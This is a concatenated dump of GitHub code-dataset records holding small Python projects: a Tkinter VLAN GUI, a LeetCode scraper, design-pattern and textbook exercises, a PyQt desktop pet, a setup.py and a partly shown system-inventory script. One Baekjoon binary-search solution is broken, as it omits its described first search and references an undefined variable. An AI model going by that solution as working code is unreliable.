sviLabel.configure(anchor='w')\n sviLabel.configure(justify='left')\n sviLabel.configure(text='''Habilitar Int. Virtual''')\n\n self.sviEntryIp = Entry(self)\n self.sviEntryIp.place(relx=0.117, rely=0.644, height=25, relwidth=0.157)\n self.sviEntryIp.configure(background=\"#ABE0FF\")\n self.sviEntryIp.configure(disabledforeground=\"#a3a3a3\")\n self.sviEntryIp.configure(font=\"TkFixedFont\")\n\n\n self.sviEntryMask = Entry(self)\n self.sviEntryMask.place(relx=0.33, rely=0.644, height=25, relwidth=0.057)\n self.sviEntryMask.configure(background=\"#ABE0FF\")\n self.sviEntryMask.configure(font=\"TkFixedFont\")\n\n\n auxLabel = Label(self)\n auxLabel.place(relx=0.267, rely=0.644, height=21, width=34)\n auxLabel.configure(text='''/''')\n\n ipLabel = Label(self)\n ipLabel.place(relx=0.05, rely=0.644, height=21, width=34)\n ipLabel.configure(font=\"-family {Andale Mono}\")\n ipLabel.configure(text='''IP''')\n\n scrollbar = Scrollbar(self)\n scrollbar.pack(side=RIGHT, fill=Y)\n textbox = Text(self)\n textbox.place(relx=0.58, rely=0.27, relheight=0.7, relwidth=0.4)\n textbox.insert(INSERT, self.dataVlans)\n # attach textbox to scrollbar\n textbox.config(yscrollcommand=scrollbar.set)\n scrollbar.config(command=textbox.yview)\n\n btnAccept = tk.Button(self,\n text='Accept',\n image=imgBtnAccept, compound='center',\n fg=\"white\", font=(\"Andale Mono\", 10),\n command=lambda:self.acceptClick())\n btnAccept.image = imgBtnAccept\n btnAccept.place(relx=0.08, rely=0.94)\n btnCancel = tk.Button(self, text='Cancel',\n image=imgBtnCancel,font=(\"Andale Mono\", 10) ,\n compound='center', fg=\"white\", command=lambda: self.destroy())\n btnCancel.image = imgBtnCancel\n btnCancel.place(relx=0.25, rely=0.94)\n raya = tk.Canvas(self)\n raya.place(relx=0.55, rely=0.226, relheight=0.651\n , relwidth=0.001)\n raya.configure(borderwidth=\"2\")\n raya.configure(highlightbackground=\"#000000\")\n raya.configure(insertbackground=\"black\")\n raya.configure(relief=\"ridge\")\n\n def acceptClick(self):\n self.data['vlanId']= int(self.vidEntry.get())\n self.data['vlanNom'] = self.nomEntry.get()\n if self.sviEntryIp.get() != '' and self.sviEntryMask.get() != '':\n self.data['layer3']['ip'] = \"{}/{}\".format(self.sviEntryIp.get(), self.sviEntryMask.get())\n print(self.data)\n self.controller.createVlans(self, self.data, self.name)\n","repo_name":"willypalacin/TFG-Guillermo-Palacin","sub_path":"Frontend/Vista/DeviceConfigVlansView.py","file_name":"DeviceConfigVlansView.py","file_ext":"py","file_size_in_byte":5337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"19341359957","text":"from bs4 import BeautifulSoup\nimport requests\n\ndef checkQuestions(username):\n url = 'https://leetcode.com/' + username + '/'\n response = requests.get(url, timeout=5)\n content = BeautifulSoup(response.content, \"html.parser\")\n questions = content.find_all('span', attrs={\"class\": \"badge progress-bar-success\"})\n totalq = questions[1].text\n totalq = totalq.strip()\n print(totalq)\n totals = totalq.split('/')\n return totals[0]","repo_name":"lct45/leetcode-reminder-bot","sub_path":"leetcode.py","file_name":"leetcode.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"34243968025","text":"from copy import deepcopy\nfrom abc import ABC\n\n\nclass Cargo:\n def __init__(self, weight, volume):\n self.weight = weight\n self.volume = volume\n\n def __str__(self):\n return f\"V{self.weight}\"\n\n\nclass Order(ABC):\n pass\n\n\nclass Prototype(Order):\n def __init__(self, cargo: Cargo, price, description):\n self.price = price\n self.cargo = cargo\n self.description = description\n\n def __str__(self):\n return f\"prototype description:{self.description} price:{self.price} weight:{self.cargo.weight}\"\n\n\nif __name__ == \"__main__\":\n order1 = Prototype(Cargo(3.5, 4), 5, \"some\")\n order2 = deepcopy(order1)\n order2.price = 10\n order2.cargo.weight = 5.0\n print(order1)\n print(order2)\n","repo_name":"IlliaShuba/gof","sub_path":"python/prototype/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"20444730780","text":"'''\r\n27651 벌레컷 - 누적 합, 이분 탐색 - Gold III\r\n숫자 리스트가 주어지면 이를 머리, 가슴, 배로 삼등분 하는데, 등분된 세 개의 sublist의 sum의 크기가 1 3 2 순서여야 하는 문제이다.\r\n우선 누적합을 저장하는 리스트 d를 만들어 시간을 단축한다.\r\n머리를 원소 하나에서 늘려가면서 for문을 돌린다. i까지가 머리에 해당한다. 삼등분이 가능한 최대의 i값인 n-3까지 진행한다.\r\n첫 번째 이분 탐색은 가슴-배 경계의 upper bound를 찾기 위한 코드이다.\r\n가슴의 크기는 생각하지 않고, 머리와 배의 크기만 비교한다.\r\ni+1~n-1 사이에서 진행하여, 배가 머리보다 클 수 있는 경계의 최댓값을 찾는다.\r\n위에서 찾은 값이 i와 같��면 해당 머리의 크기에서는 조건 만족이 불가능하다는 의미이므로 break한다.\r\n두 번째 이분 탐색은 가슴-배 경계의 lower bound를 찾기 위한 코드이다.\r\n머리의 크기에 관계없이 가슴이 배보다 클 수 있는 경계의 최솟값을 찾는다.\r\n두 탐색에서 구한 값 사이에 경계를 놓으면 무조건 문제에서 원하는 조건을 만족한다.\r\n따라서 두 값 사이에서 가능한 경계의 경우의 수를 취한다. 이 값들을 for문 전체에서 더하여 출력한다.\r\n\r\n이분 탐색 두 개에서 1 차이의 값을 설정하는 것이 어려웠다.\r\n기존 이분 탐색은 while s<=e, s=m+1, e=m-1을 사용하는데 반해 조금 달라서 어려움을 겪었다.\r\n\r\n마지막에 두 값이 같을 때는 해당 경계에서도 만족하지 않는 결과가 나올 수 있기 때문에 이를 보완하였다.\r\n예를 들어, [1,1,1,1,1]에서 a1,a2가 2가 나오는데, 이 경우 1/2/2가 되기 때문에 불가능하다.\r\n'''\r\nn = int(input())\r\nl = list(map(int, input().split()))\r\nd = [0]*n\r\nt = 0\r\nfor i in range(n): # 누적 합 만들기\r\n t += l[i]\r\n d[i] = t\r\ns, e = 0, n-1\r\nans = 0\r\nfor i in range(n-2): # a를 d[i]로 두고 진행\r\n a = d[i]\r\n s, e = i+1, n-1\r\n while s < e: # y의 upper bound 찾기 - 최소 여기에는 있어야 ac 만족.\r\n m = (s+e)//2\r\n if t-d[m] < d[m]-a:\r\n e = m\r\n else:\r\n s = m+1\r\n a2 = e\r\n #print(i, a1, a2)\r\n if a1 == a2:\r\n if t-d[a1] < d[a1]-a and a < t-d[a1]:\r\n ans += 1\r\n else:\r\n ans += a1-a2+1\r\nprint(ans)\r\n","repo_name":"evermade1/baekjoon","sub_path":"Binary Search/27651 벌레컷 - 이분 탐색, 누적 합.py","file_name":"27651 벌레컷 - 이분 탐색, 누적 합.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"11831606330","text":"# U06_Ex03_SphereAreaVol.py\n#\n# Author: Bill Montana\n# Course: Coding for OOP\n# Section: A3\n# Date: 21 Oct 2017\n# IDE: PyCharm Community Edition\n#\n# Assignment Info\n# Exercise: 3\n# Source: Python Programming\n# Chapter: 6\n#\n# Program Description\n# Solve PE 3.1 using functions sphereArea() and sphereVolume()\n# Calculates the volume and surface area of a sphere from its radius,\n# given as input.\n#\n# Algorithm (pseudocode)\n# introduce program\n# get radius (float) from user\n# get units (str) for radius\n# call sphereArea() with radius as parameter; assign to area var\n# call sphereVolume() with radius as parameter; assign to volume var\n# display results\n#\n# sphereArea()\n# r is argument\n# calculate and return surface area\n# A = 4 * math.pi * r*r\n#\n# sphereVolume()\n# r is argument\n# calculate volume and surface area\n# V = 4 / 3 * math.pi * r*r*r\n\n\n\n\nimport math\n\ndef main():\n # introduce program\n print(\"\\nThis program calculates the volume and surface area of a sphere.\\n\")\n\n # get radius (float) from user\n radius = float(input(\"What is the sphere's radius? \"))\n\n # get units (str) for radius\n units = str(input(\"What are the units for the radius? \"))\n\n # call sphereArea() with radius as parameter; assign to area var\n area = sphereArea(radius)\n\n # call sphereVolume() with radius as parameter; assign to volume var\n volume = sphereVolume(radius)\n\n # display results\n print((\"\\nA sphere with radius {0:.3f} \" + units + \" has a volume of {1:.3f} cubic \" + \\\n units + \" and a surface area of {2:.3f} square \" + units + \".\").format(radius, volume, area))\n\n# sphereArea()\n# r is argument\ndef sphereArea(r):\n # calculate and return surface area\n # A = 4 * math.pi * r*r\n area = 4 * math.pi * math.pow(r, 2)\n return area\n\n# sphereVolume()\n# r is argument\ndef sphereVolume(r):\n # calculate volume and surface area\n # V = 4 / 3 * math.pi * r*r*r\n volume = 4 / 3 * math.pi * math.pow(r, 3)\n return volume\n\n\nif __name__ == '__main__':\n main()","repo_name":"billm79/COOP2018","sub_path":"Chapter06/U06_Ex03_SphereAreaVol.py","file_name":"U06_Ex03_SphereAreaVol.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"5159101682","text":"import sys\nimport random\nimport webbrowser\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import Qt, QTimer\nfrom PyQt5 import QtWidgets, QtGui\n\nclass MyMikuPet(QWidget):\n def __init__(self):\n QtWidgets.QWidget.__init__(self)\n quit = QAction(\"退出\", self, triggered=self.close)\n quit.setIcon(QIcon(\"img/icon.png\"))\n addPet = QAction(\"添加一个Miku\", self, triggered = addOnePet)\n addPet.setIcon(QIcon(\"img/icon.png\"))\n removePet = QAction(\"移除一个Miku\", self, triggered = delOnePet)\n removePet.setIcon(QIcon(\"img/icon.png\"))\n about = QAction(\"About\", self, triggered=aboutInfo)\n about.setIcon(QIcon(\"img/icon.png\"))\n self.pet = myPet()\n self.trayIconMenu = QMenu(self)\n self.trayIconMenu.addAction(addPet)\n self.trayIconMenu.addAction(removePet)\n self.trayIconMenu.addAction(about)\n self.trayIconMenu.addAction(quit)\n self.trayIcon = QSystemTrayIcon(self)\n self.trayIcon.setIcon(QIcon(\"img/icon.png\"))\n self.trayIcon.setContextMenu(self.trayIconMenu)\n self.trayIcon.show()\n\ndef addOnePet():\n pets.append(myPet())\n\ndef delOnePet():\n if len(pets)==0:\n return\n del pets[len(pets)-1]\n\ndef aboutInfo():\n webbrowser.open_new_tab(\"https://github.com/luxingwen/desktop-pet-miku\")\n\nclass myPet(QWidget):\n def __init__(self, parent = None):\n QtWidgets.QWidget.__init__(self)\n self.initUI()\n\n def initUI(self):\n self.setWindowFlags(Qt.FramelessWindowHint|Qt.WindowStaysOnTopHint|Qt.SubWindow)\n self.setAutoFillBackground(False)\n self.setAttribute(Qt.WA_TranslucentBackground, True)\n self.repaint()\n self.img = QLabel(self)\n self.actionDatas = []\n self.initData()\n self.index = 0\n self.setPic(\"shime1.png\")\n self.resize(128, 128)\n self.show()\n self.runing = False\n self.timer = QTimer()\n self.timer.timeout.connect(self.actionRun)\n self.timer.start(500)\n self.randomPos()\n\n def getImgs(self, pics):\n listPic = []\n for item in pics:\n img = QImage()\n img.load('img/'+item)\n listPic.append(img)\n return listPic\n\n def initData(self):\n imgs = self.getImgs([\"shime1b.png\", \"shime2b.png\", \"shime1b.png\", \"shime3b\"])\n self.actionDatas.append(imgs)\n imgs = self.getImgs([\"shime11.png\", \"shime15.png\", \"shime16.png\", \"shime17.png\", \"shime16.png\", \"shime17.png\", \"shime16.png\", \"shime17.png\"])\n self.actionDatas.append(imgs)\n imgs = self.getImgs([\"shime54.png\", \"shime55.png\", \"shime26.png\", \"shime27.png\", \"shime28.png\", \"shime29.png\",\"shime26.png\", \"shime27.png\", \"shime28.png\", \"shime29.png\",\"shime26.png\", \"shime27.png\", \"shime28.png\", \"shime29.png\"])\n self.actionDatas.append(imgs)\n imgs = self.getImgs([\"shime31.png\", \"shime32.png\", \"shime31.png\", \"shime33.png\"])\n self.actionDatas.append(imgs)\n imgs = self.getImgs([\"shime18.png\", \"shime19.png\"])\n self.actionDatas.append(imgs)\n imgs = self.getImgs([\"shime34b.png\", \"shime35b.png\", \"shime34b.png\", \"shime36b.png\"])\n self.actionDatas.append(imgs)\n imgs = self.getImgs([\"shime14.png\", \"shime14.png\", \"shime52.png\", \"shime13.png\", \"shime13.png\", \"shime13.png\", \"shime52.png\", \"shime14.png\"])\n self.actionDatas.append(imgs)\n imgs = self.getImgs([\"shime42.png\", \"shime43.png\", \"shime44.png\", \"shime45.png\", \"shime46.png\"])\n self.actionDatas.append(imgs)\n imgs = self.getImgs([\"shime1.png\", \"shime38.png\", \"shime39.png\", \"shime40.png\", \"shime41.png\"])\n self.actionDatas.append(imgs)\n imgs = self.getImgs([\"shime25.png\", \"shime25.png\", \"shime53.png\", \"shime24.png\", \"shime24.png\", \"shime24.png\", \"shime53.png\", \"shime25.png\"])\n self.actionDatas.append(imgs)\n imgs = self.getImgs([\"shime20.png\", \"shime21.png\", \"shime20.png\", \"shime21.png\", \"shime20.png\"])\n self.actionDatas.append(imgs)\n\n def actionRun(self):\n if not self.runing:\n self.action = random.randint(0, len(self.actionDatas)-1)\n self.index = 0\n self.runing = True\n self.runFunc(self.actionDatas[self.action])\n\n def setPic(self, pic):\n img = QImage()\n img.load('img/'+pic) \n self.img.setPixmap(QPixmap.fromImage(img))\n\n def runFunc(self, imgs):\n if self.index >= len(imgs):\n self.index = 0\n self.runing = False\n self.img.setPixmap(QPixmap.fromImage(imgs[self.index]))\n self.index += 1\n\n def randomPos(self):\n screen = QDesktopWidget().screenGeometry()\n size = self.geometry()\n self.move((screen.width()-size.width())*random.random(), (screen.height()-size.height())*random.random())\n\n def mousePressEvent(self, event):\n if event.button()==Qt.LeftButton:\n self.m_drag=True\n self.m_DragPosition=event.globalPos()-self.pos()\n event.accept()\n self.setCursor(QCursor(Qt.OpenHandCursor))\n def mouseMoveEvent(self, QMouseEvent):\n if Qt.LeftButton and self.m_drag:\n self.move(QMouseEvent.globalPos()-self.m_DragPosition)\n QMouseEvent.accept()\n def mouseReleaseEvent(self, QMouseEvent):\n self.m_drag=False\n self.setCursor(QCursor(Qt.ArrowCursor))\n\nif __name__ == \"__main__\":\n global pets\n pets=[]\n app = QApplication(sys.argv)\n w = MyMikuPet()\n sys.exit(app.exec_())","repo_name":"luxingwen/desktop-pet-miku","sub_path":"miku.py","file_name":"miku.py","file_ext":"py","file_size_in_byte":5566,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"69"}
+{"seq_id":"5995067601","text":"import sys\n\nn = int(sys.stdin.readline())\nans = 0\nfor i in range(1, n):\n result = 0\n result += i\n for j in str(i):\n result += int(j)\n if result == n:\n ans = i\n break\nprint(ans)\n","repo_name":"Lee9Bin/python_algorism","sub_path":"algorism/daily/2231.py","file_name":"2231.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"23724265851","text":"import os\nimport random\nimport shutil\n\nbase_file_path = r'C:\\Users\\NailinLiao\\Desktop\\单帧车载电源动态\\camera'\ncamera_list = ['camera1', 'camera2', 'camera3']\nsave_path = r'C:\\Users\\NailinLiao\\Desktop\\ret'\nRandom_len = 300\npartition = 3\n\n\ndef get_random_file_list(get_path, Random_len):\n file_name_list = os.listdir(get_path)\n random_file_name_list = random.sample(file_name_list[10000:], Random_len)\n return random_file_name_list\n\n\ndef chunks(origin_list, n):\n if len(origin_list) % n == 0:\n cnt = len(origin_list) // n\n else:\n cnt = len(origin_list) // n + 1\n\n for i in range(0, n):\n yield origin_list[i * cnt:(i + 1) * cnt]\n\n\ndef main():\n random_file_name_list = get_random_file_list(os.path.join(base_file_path, 'camera1'), Random_len)\n chunks_list = chunks(random_file_name_list, partition)\n\n for index, chunk in enumerate(chunks_list):\n save_chunk = os.path.join(save_path, str(index))\n if not os.path.exists(save_chunk):\n os.makedirs(save_chunk)\n\n for file in chunk:\n for camera in camera_list:\n img_path = os.path.join(base_file_path, camera, file)\n img_name = str(file).split('.')[0] + '_' + str(camera) + '.png'\n shutil_path = os.path.join(save_chunk, img_name)\n print('Copy:', img_path, ' To ', shutil_path)\n try:\n shutil.copy(img_path, shutil_path)\n except:\n print('Erro:', img_path)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"NailinLiao/DataDevelopment","sub_path":"Data_tools/CameraSynchronizationCheck.py","file_name":"CameraSynchronizationCheck.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"29689642136","text":"import numpy as np\n\ndef calc_forward(i, m):\n p = len(m) - 1\n col = m[:, i]\n i_max = i + np.argmax(np.abs(col[i:]))\n if i != i_max:\n m = np.concatenate([m[:i, :], m[i_max, :][None,:], m[i+1:i_max], m[i, :][None,:], m[i_max+1:,:]], axis=0)\n \n aii = 1. / m[i, i]\n for j in range(i + 1, p + 1):\n aji = m[j, i]\n for k in range(i + 1, p + 2):\n m[j, k] = m[j, k] - aji * aii * m[i, k]\n return m\n\ndef back_substitution(m):\n num_rows = len(m)\n ret_val = np.zeros(num_rows)\n p = num_rows - 1\n\n for i in range(p, -1, -1):\n #print(i, m)\n sum_ = 0\n for j in range(i + 1, p + 1):\n sum_ += m[i, j] * ret_val[j]\n ret_val[i] = (m[i, (p + 1)] - sum_) / m[i, i]\n return ret_val\n\ndef solve_gauss(m):\n for i in range(0, len(m) - 1):\n m = calc_forward(i, m)\n print(m)\n return back_substitution(m)\n ","repo_name":"nigulo/python","sub_path":"math/linear_equations.py","file_name":"linear_equations.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"12259020482","text":"class Student:\n clg_name = 'SIET'\n clg_fee = 85000\n def __init__(self,roll_no,dept):\n self.roll_no = roll_no\n self.dept = dept\n\n def student_details(self):\n print(\"College Name: \" + self.clg_name)\n print(\"roll_no: \" + str(self.roll_no))\n print(\"dept: \" + str(self.dept))\n\nclass Hosteler(Student):\n hstl_fee = 75000\n def __init__(self,roll_no,dept,room_no):\n self.room_no = room_no\n Student.__init__(self,roll_no,dept)\n\n def student_details(self):\n print(\"College Name: \" + self.clg_name)\n print(\"roll_no: \" + str(self.roll_no))\n print(\"dept: \" + str(self.dept))\n print(\"Hostel Room No : \" + str(self.room_no))\n\ns1 = Hosteler('18cse30','CSE',112)\ns1.student_details()","repo_name":"kausic-eunimart/June-month-progress","sub_path":"June/oops_python/inheritance.py","file_name":"inheritance.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"37102857062","text":"S = input()\nQ = int(input())\n\ndef g(s,add):\n return chr((ord(s)-ord('A')+add)%3+ord('A'))\n\ndef f(t,k):\n if k == 0:\n return g(S[0],t)\n if t == 0:\n return S[k]\n return g(f(t-1,k//2),k%2+1)\n\nfor i in range(Q):\n t,k = map(int,input().split())\n print(f(t,k-1))\n\n","repo_name":"seigot/atcoder","sub_path":"abc242/d/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"44130909763","text":"\"\"\"\nCleans spectras (if required) and adds equivalent noisy version of datasets\n\"\"\"\n\nimport pandas as pd\nimport pickle\nimport numpy as np\nimport click\nimport os\n\n@click.command()\n@click.option('--dataset_path',default=\"../processed/spectra_noiseless.pd\", help='path to dataset')\n@click.option('--new_name',default=\"spectra\", help='name of new dataset paths')\ndef make_dataset(dataset_path,new_name,SNs = [10,30,50,100]):\n df = pd.read_pickle(dataset_path)\n df[\"spectra\"] = df[\"spectra\"].apply(remove_zeros)\n #df.to_pickle(dataset_path)\n folder_path = os.path.split(dataset_path)[0]\n for SN in SNs:\n df_new =df.copy()\n df_new[\"spectra\"] = df_new[\"spectra\"].apply(add_noise,noise=1/SN)\n df_new.to_pickle(\"{}/{}_SN_{}.pd\".format(folder_path,new_name,SN))\n\n\ndef remove_zeros(spectra): \n return spectra[np.nonzero(spectra)[0]]\n\ndef add_noise(spectra,noise): #need to add some noise to the spectra\n noise = np.random.normal(0,noise,len(spectra))\n return noise+spectra\n\n\nif __name__ == '__main__':\n make_dataset()\n\n","repo_name":"drd13/tagging-package","sub_path":"data/scripts/noiseSpectra.py","file_name":"noiseSpectra.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"26507442021","text":"# -*- coding: utf-8 -*-\nimport typing\n\nfrom streamlit.delta_generator import DeltaGenerator\n\nfrom kiara_streamlit.pipelines.pages import PipelinePage\n\n\nclass StagePage(PipelinePage):\n \"\"\"A page that renders a UI for a specific pipeline stage.\"\"\"\n\n def __init__(self, id: str, config: typing.Mapping[str, typing.Any] = None):\n\n if config is None:\n config = {}\n self._stage: int = config.get(\"stage\", None)\n if self._stage is None:\n raise Exception(\n \"Invalid config for pipeline page of type 'stage': no 'stage' configuration provided.\"\n )\n if not isinstance(self._stage, int):\n raise Exception(\n \"Invalid config for pipeline page of type 'stage': 'stage' configuration must be an integer.\"\n )\n\n super().__init__(id=id)\n\n def run_page(self, st: DeltaGenerator):\n\n # make sure all required inputs for the steps in this stage are ready\n self.check_stage_requirements_valid(self._stage)\n\n # retrieve all relevant inputs for this stage\n stage_inputs = self.get_pipeline_inputs_for_stage(self._stage)\n\n st.markdown(\"### Inputs\")\n # render a set of input components for this stage\n stage_input_data = st.kiara.valueset_input(\n stage_inputs, key=self.get_page_key(\"stage_inputs\"), defaults=stage_inputs\n )\n\n # set the inputs we got from the user\n self.set_pipeline_inputs(inputs=stage_input_data, render_errors=True)\n\n process_btn = st.button(\"Process\", key=self.get_page_key(\"process_button\"))\n\n # check if the process button was clicked\n if process_btn:\n # get updated pipeline inputs after user input\n pipeline_stage_inputs = self.get_pipeline_inputs_for_stage(self._stage)\n\n # check if all inputs are valid, otherwise render error and do nothing\n invalid = self.check_invalid_values(\n pipeline_stage_inputs, render_error=True\n )\n if not invalid:\n # process all steps in this stage\n self._cache[\"last_processing_results\"] = self.process_stage(\n self._stage, render_result=False, container=st\n )\n\n last_processing_results = self._cache.get(\"last_processing_results\", None)\n if last_processing_results is not None:\n # here we print the results of the processing (if there are any)\n # the reason this is stored in the object is to be able to display the results if the user\n # navigated away and back from/to this page\n self.render_stage_processing_result(\n last_processing_results, only_stage=self._stage, container=st\n )\n\n # let the user choose whether they want to see all step outputs\n show_step_outputs = st.checkbox(\"Show step outputs\", value=False)\n if show_step_outputs:\n # if the user wants to check step outputs, he can choose to\n for step_id in self.get_step_ids_for_stage(self._stage):\n st.write(f\"#### Step output: '{step_id}\")\n _outputs = self.get_step_outputs(step_id)\n st.kiara.write_valueset(\n _outputs, key=self.get_page_key(\"step_output_preview\"), container=st\n )\n\n # let the user choose whether they want to see pipeline outputs of this stage (if any)\n outputs = self.get_pipeline_outputs_for_stage(self._stage)\n if outputs:\n # if there are any pipeline outputs produced in this stage, display them here\n show_outputs = st.checkbox(\"Show pipeline outputs\", value=True)\n if show_outputs:\n st.kiara.write_valueset(\n outputs,\n add_save_option=True,\n key=self.get_page_key(\"pipeline_output_preview\"),\n container=st,\n )\n","repo_name":"frkl-io/kiara.streamlit","sub_path":"src/kiara_streamlit/pipelines/pages/stage.py","file_name":"stage.py","file_ext":"py","file_size_in_byte":3969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"10508529827","text":"import pytest\nimport yaml\n\nfrom dataClasses.load import recipesFromConfig\nfrom graphClasses.graph import Graph\n\nimport json\ndef loadTestConfig():\n with open('config_factory_graph.yaml', 'r') as f:\n graph_config = yaml.safe_load(f)\n return graph_config\n\n# Note that recipe ordering is deterministic!\n# (Thanks to the OrderedDict hook in dataClasses.load.recipesFromConfig)\n\n\ndef test_connectionSimple():\n project_name = 'simpleGraph'\n\n # Load recipes\n recipes = recipesFromConfig(project_name, project_folder='tests/testProjects')\n\n # Create graph\n g = Graph(project_name, recipes, loadTestConfig())\n g.connectGraph()\n\n ### Check connections\n # 0: electrolyzer\n # 1: extractor\n\n expected_edges = [\n ('source', '1', 'sugar beet'),\n ('1', '0', 'sugar'),\n ('0', 'sink', 'carbon dust'),\n ('0', 'sink', 'oxygen'),\n ('0', 'sink', 'water'),\n ]\n\n assert set(expected_edges) == set(g.edges.keys())\n\n\ndef test_connectionLoop():\n project_name = 'loopGraph'\n\n # Load recipes\n recipes = recipesFromConfig(project_name, project_folder='tests/testProjects')\n\n # Create graph\n g = Graph(project_name, recipes, loadTestConfig())\n g.connectGraph()\n g.removeBackEdges()\n\n ### Check connections\n # 0: distillation tower\n # 1: large chemical reactor\n\n expected_edges = [\n ('source', '1', 'acetic acid'),\n ('source', '1', 'sulfuric acid'),\n ('1', '0', 'diluted sulfuric acid'),\n ('1', 'sink', 'ethenone'),\n ('0', 'sink', 'sulfuric acid'),\n ('0', 'sink', 'water'),\n ]\n\n assert set(expected_edges) == set(g.edges.keys())\n","repo_name":"Eldrinn-Elantey/gtnh-flow","sub_path":"tests/test_graph.py","file_name":"test_graph.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"69"}
+{"seq_id":"5624431264","text":"import pathlib\nfrom pytz import VERSION\nfrom setuptools import find_packages, setup\n\nHERE = pathlib.Path(__file__).parent\n\nVERSION = '0.0.2b' #\nPACKAGE_NAME = 'ProbabilityLib' #Ojo es el nombre de la libreria y de la carpeta\nAUTHOR = 'L Felipe Guerrero'\nAUTHOR_EMAIL = 'felipe.guerrero@correounivalle.edu.co' \nURL = '' \n\nLICENSE = 'MIT' #Tipo de licencia\nDESCRIPTION = 'Librería para leer ficheros PDFs y extraer la información en formato str' #Descripción corta\nLONG_DESCRIPTION = (HERE / \"README.md\").read_text(encoding='utf-8') #Referencia al documento README con una descripción más elaborada\nLONG_DESC_TYPE = \"text/markdown\"\n\n\n#Paquetes necesarios para que funcione la libreía. Se instalarán a la vez si no lo tuvieras ya instalado\nINSTALL_REQUIRES = [\n 'pandas',\n 'matplotlib',\n 'pymc3',\n 'numpy',\n 'seaborn',\n 'scipy',\n ]\nsetup(\n name=PACKAGE_NAME,\n version=VERSION,\n description=DESCRIPTION,\n long_description=LONG_DESCRIPTION,\n long_description_content_type=LONG_DESC_TYPE,\n author=AUTHOR,\n author_email=AUTHOR_EMAIL,\n url=URL,\n install_requires=INSTALL_REQUIRES,\n license=LICENSE,\n packages=find_packages(),\n include_package_data=True\n)","repo_name":"LFGuerreroM/Probability","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"10790256150","text":"import subprocess\nimport os\nimport json\n\n#get hostname info\ncmd = subprocess.Popen(['hostname'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n(output, err) = cmd.communicate()\nhostname=(output.decode().strip())\n\n#get cpu info\ncpuinfo = os.popen(\"cat /proc/cpuinfo | grep 'model name' | uniq | awk -F ':' '{print $2}' | sed 's/^ *//'\")\ncpuinfo = cpuinfo.read()\ncpuinfo = cpuinfo.strip()\n\n#get disks info\ndiskinfo = os.popen(\"df -h | grep -v 'tmpfs\\|boot\\|Filesystem' | awk -F ' ' '{ print $6\\\" \\\"$2\\\" \\\"}' | tr -d '\\n'\")\ndiskinfo = diskinfo.read()\ndiskinfo = diskinfo.strip()\n\n#get mem info\nmeminfo = os.popen(\"free -m | grep '^Mem' | awk -F ' ' '{ print $2 }'\")\nmeminfo = meminfo.read()\nmeminfo = meminfo.strip()\nmeminfo = round(float(meminfo)/1024)\n#meminfo = float(meminfo)\n\n#get os info\nosinfo = os.popen(\"uname\")\nosinfo = osinfo.read()\nosinfo = osinfo.strip()\n\n#get os kernel / version info\noskinfo = os.popen(\"uname -r\")\noskinfo = oskinfo.read()\noskinfo = oskinfo.strip()\n\n#get ip addr v4\nipv4info = os.popen(\"ip addr | grep -w inet | awk -F ' ' '{ print $2\\\" \\\" }' | grep -Ev '^127.0|::1/128' | awk -F '/' '{ print $1\\\" \\\" }' | tr -d '\\n'\")\nipv4info = ipv4info.read()\nipv4info = ipv4info.strip()\n\n#get ip addr v6\nipv6info = os.popen(\"ip addr | grep -w inet6 | awk -F ' ' '{ print $2\\\" \\\" }' | grep -Ev '^127.0|::1/128' | awk -F '/' '{ print $1\\\" \\\" }' | tr -d '\\n'\")\nipv6info = ipv6info.read()\nipv6info = ipv6info.strip()\n\n#get hardware info\n\n#serial number\nserialnmbr = os.popen(\"sudo dmidecode -s system-serial-number\")\nserialnmbr = serialnmbr.read()\nserialnmbr = serialnmbr.strip()\n\n#product manufacturer\nprodman = os.popen(\"sudo dmidecode -s system-manufacturer\")\nprodman = prodman.read()\nprodman = prodman.strip()\n\n#Product Name\nprodname = os.popen(\"sudo dmidecode -s system-product-name\")\nprodname = prodname.read()\nprodname = prodname.strip()\n\n\n#print(hostname+\" \"+cpuinfo+\" \"+str(meminfo)+\" \"+diskinfo+\" \"+osinfo+\" \"+oskinfo+\" \"+ipv4info+\" \"+ipv6info)\n\nprint(\"Hostname: \"+hostname)\nprint(\"CPU: \"+cpuinfo)\nprint(\"Memory: \"+str(meminfo))\nprint(\"Disks: \"+diskinfo)\nprint(\"OS: 